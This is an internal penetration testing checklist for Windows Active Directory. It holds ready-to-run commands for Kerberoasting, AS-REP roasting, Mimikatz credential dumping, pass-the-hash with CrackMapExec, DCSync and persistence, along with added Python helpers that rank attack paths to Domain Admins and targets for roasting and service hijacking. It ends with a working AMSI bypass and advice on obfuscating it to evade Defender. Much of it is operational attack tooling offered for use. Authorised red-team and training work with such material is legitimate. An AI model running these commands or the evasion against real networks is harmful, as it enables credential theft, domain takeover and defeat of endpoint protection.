Internal Penetration Testing

🔍 Initial Reconnaissance

Network Discovery

  • Identify network range (netdiscover, arp-scan)
  • Port scanning (nmap -sV -sC)
  • Identify domain controllers
  • Enumerate DNS records
  • LLMNR/NBT-NS poisoning (Responder)
  • ARP spoofing potential
  • Identify network segmentation

Service Enumeration

  • SMB shares enumeration (smbclient, CrackMapExec)
  • SNMP enumeration
  • LDAP anonymous bind
  • RPC enumeration
  • Web services on internal hosts
  • Database servers (MSSQL, MySQL, Oracle)
  • Printers and IoT devices
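A small helper for the discovery and enumeration steps above, added here as an example (not part of the original checklist or any of the tools it names): it parses nmap grepable (-oG) output, flags hosts that expose Kerberos, LDAP and SMB together as probable domain controllers, and buckets the rest by the service classes listed under Service Enumeration. The scan output, addresses and host names in SAMPLE_GNMAP are constructed.

```python
"""Added example: parse nmap grepable (-oG) output, flag probable domain
controllers and bucket hosts by the services the checklist enumerates.
SAMPLE_GNMAP is constructed; the addresses and host names are hypothetical."""
import re
from collections import defaultdict

SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated (constructed sample)
Host: 10.10.10.5 (dc01.corp.local)\tPorts: 53/open/tcp//domain///, 88/open/tcp//kerberos-sec///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 636/open/tcp//ssl|ldap///, 3268/open/tcp//ldap///\tIgnored State: filtered (994)
Host: 10.10.10.20 (fs01.corp.local)\tPorts: 135/open/tcp//msrpc///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///
Host: 10.10.10.30 (sql01.corp.local)\tPorts: 445/open/tcp//microsoft-ds///, 1433/open/tcp//ms-sql-s///, 5985/open/tcp//wsman///
Host: 10.10.10.40 ()\tPorts: 161/open/udp//snmp///, 9100/open/tcp//jetdirect///
# Nmap done
"""

# Kerberos + LDAP + SMB on one host is a strong domain-controller signal.
DC_PORTS = {88, 389, 445}
HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)\tPorts: (.*?)(?:\t|$)")
# Service buckets matching the enumeration checklist above.
CATEGORIES = {
    "smb": {445}, "winrm": {5985, 5986}, "rdp": {3389}, "mssql": {1433},
    "mysql": {3306}, "oracle": {1521}, "snmp": {161}, "printer": {631, 9100},
    "web": {80, 443, 8080, 8443},
}

def parse_gnmap(text):
    """Return {ip: {"name": hostname, "ports": {port: (proto, service)}}}."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue
        ip, name, ports = m.groups()
        entry = {"name": name, "ports": {}}
        for p in ports.split(", "):
            # gnmap port field: port/state/proto/owner/service/rpcinfo/version/
            f = p.split("/")
            if len(f) >= 5 and f[1] == "open":
                entry["ports"][int(f[0])] = (f[2], f[4])
        hosts[ip] = entry
    return hosts

def likely_dcs(hosts):
    """IPs exposing every port in DC_PORTS; confirm with LDAP/SMB enumeration."""
    return sorted(ip for ip, h in hosts.items() if DC_PORTS <= set(h["ports"]))

def services_by_category(hosts):
    """Group hosts by service class so each enumeration step has a target list."""
    out = defaultdict(list)
    for ip, h in sorted(hosts.items()):
        for cat, ports in CATEGORIES.items():
            if ports & set(h["ports"]):
                out[cat].append(ip)
    return dict(out)

if __name__ == "__main__":
    hosts = parse_gnmap(SAMPLE_GNMAP)
    print("probable DCs:", likely_dcs(hosts))
    for cat, ips in services_by_category(hosts).items():
        print(f"{cat:8s} {', '.join(ips)}")
```

Treat the DC list as a hint only: a host that happens to run Kerberos, LDAP and SMB (an ADFS or ADAM box, for instance) will match too, so confirm with an LDAP rootDSE query or the SMB host enumeration that follows.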

👤 Active Directory Enumeration

Domain Information

  • Enumerate domain users (GetADUsers.py)
  • Enumerate domain groups
  • Enumerate domain computers
  • Identify domain admins
  • Check password policy
  • Enumerate GPOs
  • Check for LAPS deployment

BloodHound Collection

# SharpHound
.\SharpHound.exe -c All -d domain.local

# Python collector
bloodhound-python -d domain.local -u user -p pass -ns DC_IP -c all

AD Attack Paths

  • Identify shortest path to DA
  • Find kerberoastable accounts
  • Find AS-REP roastable users
  • Identify delegation issues
  • Find users with DCSync rights
  • Check for GPP passwords
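What "identify shortest path to DA" and "find users with DCSync rights" reduce to once the collection is in hand, as an added example (not BloodHound's own query code): a breadth-first search over a BloodHound-style edge list from a compromised principal to the Domain Admins group, plus a check that a principal holds both replication rights on the domain object. EDGES, CORP.LOCAL and every principal in it are constructed; in practice the triples come from the JSON that SharpHound or bloodhound-python emit.

```python
"""Added example: breadth-first search for the shortest attack path to
Domain Admins over a BloodHound-style edge list, plus a DCSync-rights
check. EDGES is constructed; CORP.LOCAL and every principal in it are
hypothetical. Real input is the JSON SharpHound / bloodhound-python emit."""
from collections import deque

DOMAIN = "CORP.LOCAL"
DA = f"DOMAIN ADMINS@{DOMAIN}"

# (source, relationship, target) in BloodHound's edge vocabulary (constructed).
EDGES = [
    ("BOB@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "AdminTo", "WS01.CORP.LOCAL"),
    ("WS01.CORP.LOCAL", "HasSession", "SVC_BACKUP@CORP.LOCAL"),
    ("SVC_BACKUP@CORP.LOCAL", "GenericAll", "IT-ADMINS@CORP.LOCAL"),
    ("IT-ADMINS@CORP.LOCAL", "MemberOf", DA),
    ("BOB@CORP.LOCAL", "AdminTo", "FS01.CORP.LOCAL"),
    ("FS01.CORP.LOCAL", "HasSession", "ALICE@CORP.LOCAL"),
    ("ALICE@CORP.LOCAL", "MemberOf", DA),
    ("SVC_SQL@CORP.LOCAL", "GetChanges", DOMAIN),
    ("SVC_SQL@CORP.LOCAL", "GetChangesAll", DOMAIN),
    ("SVC_WEB@CORP.LOCAL", "GetChanges", DOMAIN),
]

# Edges where controlling the source lets you take over the target.
TRAVERSABLE = {
    "MemberOf", "AdminTo", "HasSession", "GenericAll", "GenericWrite",
    "WriteDacl", "WriteOwner", "Owns", "AllExtendedRights",
    "ForceChangePassword", "AddMember", "ExecuteDCOM", "CanPSRemote",
}

def build_graph(edges):
    graph = {}
    for src, rel, dst in edges:
        if rel in TRAVERSABLE:
            graph.setdefault(src, []).append((rel, dst))
    return graph

def shortest_path(edges, start, target=DA):
    """BFS from a compromised principal; returns the alternating
    [node, edge, node, ..., target] list or None if unreachable."""
    graph = build_graph(edges)
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            break
        for rel, nxt in graph.get(node, []):
            if nxt not in prev:          # first discovery = fewest hops
                prev[nxt] = (node, rel)
                queue.append(nxt)
    if target not in prev:
        return None
    path, node = [target], target
    while prev[node] is not None:
        node, rel = prev[node]
        path = [node, rel] + path
    return path

def dcsync_principals(edges, domain=DOMAIN):
    """DCSync needs BOTH DS-Replication-Get-Changes and -Get-Changes-All on
    the domain object; a principal with only one of them cannot replicate."""
    rights = {}
    for src, rel, dst in edges:
        if dst == domain and rel in ("GetChanges", "GetChangesAll"):
            rights.setdefault(src, set()).add(rel)
    return sorted(p for p, r in rights.items() if r == {"GetChanges", "GetChangesAll"})

if __name__ == "__main__":
    path = shortest_path(EDGES, "BOB@CORP.LOCAL")
    print(" -> ".join(path), f"({(len(path) - 1) // 2} hops)")
    print("DCSync-capable:", dcsync_principals(EDGES))
```

BFS counts hops, not effort: a three-hop path through a HasSession edge still needs local admin on that host and a credential dump, so rank the candidate paths by what each edge costs to exercise, and leave TRAVERSABLE without edges like CanRDP that give a foothold but not control.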

🎫 Kerberos Attacks

Kerberoasting

# Impacket
GetUserSPNs.py domain/user:password -dc-ip DC_IP -request

# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt

  • Request TGS for service accounts
  • Crack service account hashes
  • Identify high-value service accounts

AS-REP Roasting

# Impacket
GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IP

  • Identify users without pre-auth
  • Request AS-REP tickets
  • Crack obtained hashes
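The selection step behind both the Kerberoasting and AS-REP roasting sections above, as an added example (not Impacket's or Rubeus's code): given user objects with their LDAP attributes, pick the accounts worth requesting tickets for, note which ones are privileged, and predict which hashcat mode the resulting hash will need. USERS is a constructed sample with hypothetical account names; the userAccountControl and msDS-SupportedEncryptionTypes bit values are the documented ones.

```python
"""Added example: triage user objects for Kerberoasting and AS-REP
roasting from their LDAP attributes. USERS is a constructed sample with
hypothetical account names; in practice feed it the result of an LDAP
search for (servicePrincipalName=*) and for
(userAccountControl:1.2.840.113556.1.4.803:=4194304)."""

# userAccountControl bits (MS-ADTS).
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000
# msDS-SupportedEncryptionTypes bits.
RC4_HMAC, AES128, AES256 = 0x04, 0x08, 0x10

USERS = [  # constructed sample records
    {"sAMAccountName": "krbtgt", "servicePrincipalName": ["kadmin/changepw"],
     "userAccountControl": 0x0202, "adminCount": 1},
    {"sAMAccountName": "svc_sql", "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"],
     "userAccountControl": 0x10200, "adminCount": 0},
    {"sAMAccountName": "svc_backup", "servicePrincipalName": ["backup/fs01.corp.local"],
     "userAccountControl": 0x10200, "adminCount": 1,
     "msDS-SupportedEncryptionTypes": AES128 | AES256},
    {"sAMAccountName": "svc_old", "servicePrincipalName": ["HTTP/old.corp.local"],
     "userAccountControl": 0x10202, "adminCount": 0},
    {"sAMAccountName": "jdoe", "servicePrincipalName": [],
     "userAccountControl": 0x10200 | DONT_REQ_PREAUTH, "adminCount": 0},
    {"sAMAccountName": "bsmith", "servicePrincipalName": [],
     "userAccountControl": 0x10200, "adminCount": 0},
]

def is_enabled(u):
    return not (u["userAccountControl"] & ACCOUNTDISABLE)

def kerberoastable(users):
    """Enabled accounts with an SPN. krbtgt is skipped (random password, never
    crackable) as are machine accounts (random 120-character passwords)."""
    out = []
    for u in users:
        name = u["sAMAccountName"]
        if not u["servicePrincipalName"] or not is_enabled(u):
            continue
        if name.lower() == "krbtgt" or name.endswith("$"):
            continue
        out.append(name)
    return out

def asrep_roastable(users):
    """DONT_REQ_PREAUTH set: the KDC returns an AS-REP without proof of the password."""
    return [u["sAMAccountName"] for u in users
            if is_enabled(u) and u["userAccountControl"] & DONT_REQ_PREAUTH]

def hashcat_mode(u):
    """RC4 allowed (or attribute unset) -> $krb5tgs$23$ -> mode 13100.
    AES-only accounts yield etype 18 tickets -> mode 19700, far slower to crack."""
    etypes = u.get("msDS-SupportedEncryptionTypes", 0)
    return 13100 if etypes == 0 or etypes & RC4_HMAC else 19700

def prioritise(users):
    """(name, adminCount, hashcat mode) for roastable accounts, privileged first."""
    names = set(kerberoastable(users))
    targets = [u for u in users if u["sAMAccountName"] in names]
    targets.sort(key=lambda u: (-u.get("adminCount", 0), u["sAMAccountName"]))
    return [(u["sAMAccountName"], u.get("adminCount", 0), hashcat_mode(u)) for u in targets]

if __name__ == "__main__":
    print("kerberoast:", prioritise(USERS))
    print("asrep:", asrep_roastable(USERS))
```

The encryption-type check matters in practice: GetUserSPNs.py and Rubeus ask for RC4 so the hash lands in mode 13100, but an account with AES-only msDS-SupportedEncryptionTypes will return an etype 18 ticket, and requesting RC4 for such accounts is also an easy detection (event 4769 with encryption type 0x17 against an AES account).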

Pass-the-Ticket

  • Extract tickets from memory (Mimikatz)
  • Inject tickets for lateral movement
  • Golden ticket attack
  • Silver ticket attack

🔑 Credential Harvesting

Memory Extraction

# Mimikatz (run privilege::debug first for sekurlsa and lsadump::sam; dcsync only needs replication rights on the domain, not code on the DC)
sekurlsa::logonpasswords
sekurlsa::tickets /export
lsadump::sam
lsadump::dcsync /domain:domain.local /user:Administrator

Credential Locations

  • LSASS memory dump
  • SAM/SYSTEM/SECURITY hives
  • NTDS.dit extraction
  • Cached credentials
  • Browser saved passwords
  • KeePass databases
  • Configuration files

Hash Cracking

# Hashcat
hashcat -m 1000 hashes.txt wordlist.txt  # NTLM
hashcat -m 13100 hashes.txt wordlist.txt # Kerberoast
hashcat -m 18200 hashes.txt wordlist.txt # AS-REP

↔️ Lateral Movement

Techniques

  • Pass-the-Hash (PTH)
  • Pass-the-Ticket (PTT)
  • Overpass-the-Hash
  • PSExec / SMBExec
  • WMI execution
  • WinRM / PowerShell Remoting
  • RDP hijacking
  • DCOM execution

CrackMapExec

# CrackMapExec is no longer maintained; NetExec (nxc) is the drop-in successor with the same syntax
# Spray one credential across hosts; "Pwn3d!" marks local admin (--local-auth = local account, omit it for domain creds)
cme smb targets.txt -u user -p pass --local-auth

# Execute commands with pass-the-hash (NT hash, no password needed)
cme smb target -u admin -H hash -x "whoami"

# Dump SAM (needs local admin on the target)
cme smb target -u admin -H hash --sam

⬆️ Privilege Escalation

Windows PrivEsc

  • Unquoted service paths
  • Weak service permissions
  • AlwaysInstallElevated
  • Scheduled tasks
  • Autologon credentials
  • Token impersonation (Potato attacks)
  • UAC bypass
  • DLL hijacking
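Unquoted service paths are the first item above and the one that is easiest to get wrong by hand, so here is an added example (not winPEAS or PowerUp code) of what the check actually computes: for each service whose ImagePath is unquoted and contains spaces, the binaries Windows would try before the real one, and the directories the attacker needs write access to. SERVICES is a constructed sample with hypothetical vendor paths; on a real host feed it `wmic service get name,pathname` or Get-CimInstance Win32_Service output.

```python
"""Added example: the candidate binaries Windows would try for an unquoted
service path containing spaces. SERVICES is a constructed sample (hypothetical
vendor paths); in practice feed it the output of
`wmic service get name,pathname` or Get-CimInstance Win32_Service."""
import ntpath

SERVICES = {  # constructed: service name -> ImagePath as stored in the registry
    "GoodSvc": r'"C:\Program Files\Good Vendor\Agent\good.exe" -service',
    "VulnSvc": r"C:\Program Files\Vuln Vendor\Monitor Tool\monitor.exe --daemon",
    "SysSvc": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "NoSpaceSvc": r"C:\Tools\agent.exe",
}

def binary_path(image_path):
    """Return (path, quoted). A quoted path ends at the closing quote; an
    unquoted one is ambiguous, which is exactly the bug being checked."""
    s = image_path.strip()
    if s.startswith('"'):
        return s[1:s.index('"', 1)], True
    return s, False

def hijack_candidates(image_path):
    """CreateProcess resolves an unquoted command line by trying every prefix
    that ends at a space, appending .exe to extensionless tokens, before the
    full path. Each returned path is one an attacker could plant."""
    path, quoted = binary_path(image_path)
    if quoted or " " not in path:
        return []
    # Keep only up to the executable name; anything after it is arguments.
    # (A binary without a .exe suffix keeps its arguments here; rare for services.)
    exe_end = path.lower().find(".exe")
    if exe_end != -1:
        path = path[:exe_end + 4]
    candidates = []
    idx = path.find(" ")
    while idx != -1:
        candidates.append(path[:idx] + ".exe")
        idx = path.find(" ", idx + 1)
    return candidates

def dirs_to_check(image_path):
    """Directories the attacker needs write access to, one per candidate;
    verify with icacls or Get-Acl on the target host."""
    return [ntpath.dirname(c) for c in hijack_candidates(image_path)]

def audit(services):
    """Services with at least one hijackable prefix."""
    return {name: hijack_candidates(p) for name, p in services.items() if hijack_candidates(p)}

if __name__ == "__main__":
    for name, cands in audit(SERVICES).items():
        print(name)
        for c, d in zip(cands, dirs_to_check(SERVICES[name])):
            print(f"  plant {c:48s} needs write on {d}")
```

A finding only counts when one of the listed directories is writable by your current user and the service runs as SYSTEM and can be restarted (or the host rebooted); the path analysis alone is not an escalation.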

Tools

# WinPEAS
.\winPEASx64.exe

# PowerUp
. .\PowerUp.ps1
Invoke-AllChecks

# Seatbelt
.\Seatbelt.exe -group=all

🏰 Domain Dominance

DCSync Attack

# Mimikatz
lsadump::dcsync /domain:domain.local /all /csv

# Impacket
secretsdump.py domain/admin:password@DC_IP

Persistence

  • Golden Ticket
  • Silver Ticket
  • Skeleton Key
  • AdminSDHolder abuse
  • DCSync backdoor
  • Group Policy modification

🛡️ Defense Evasion

Techniques

  • Disable Windows Defender
  • AMSI bypass
  • ETW bypass
  • Process injection
  • Living off the land (LOLBins)
  • Fileless malware techniques

AMSI Bypass Examples

# Classic amsiInitFailed bypass, shown in plaintext; this exact string is signatured by Defender, so in practice it must be obfuscated (string splitting, encoding) or replaced with a memory patch of AmsiScanBuffer
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Last updated: 2024
